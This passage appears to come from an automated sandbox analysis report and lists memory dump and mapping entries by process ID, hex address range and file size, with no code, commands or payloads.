                                                                                                                                                                                                                                    • memory/4856-296-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-294-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-292-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-301-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-289-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-288-0x0000000002310000-0x0000000002311000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-303-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-305-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-306-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-307-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-308-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-310-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4856-304-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4896-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4908-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4932-287-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                                    • memory/4932-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4948-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4972-278-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5180-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5216-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5220-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5424-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5532-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5564-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5600-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5620-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5668-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5708-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5744-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5756-436-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5772-439-0x00007FF774914060-mapping.dmp
                                                                                                                                                                                                                                    • memory/5792-438-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5852-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5916-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5936-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5968-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/6016-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/6024-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/6032-534-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/6068-459-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/6112-462-0x0000000000000000-mapping.dmp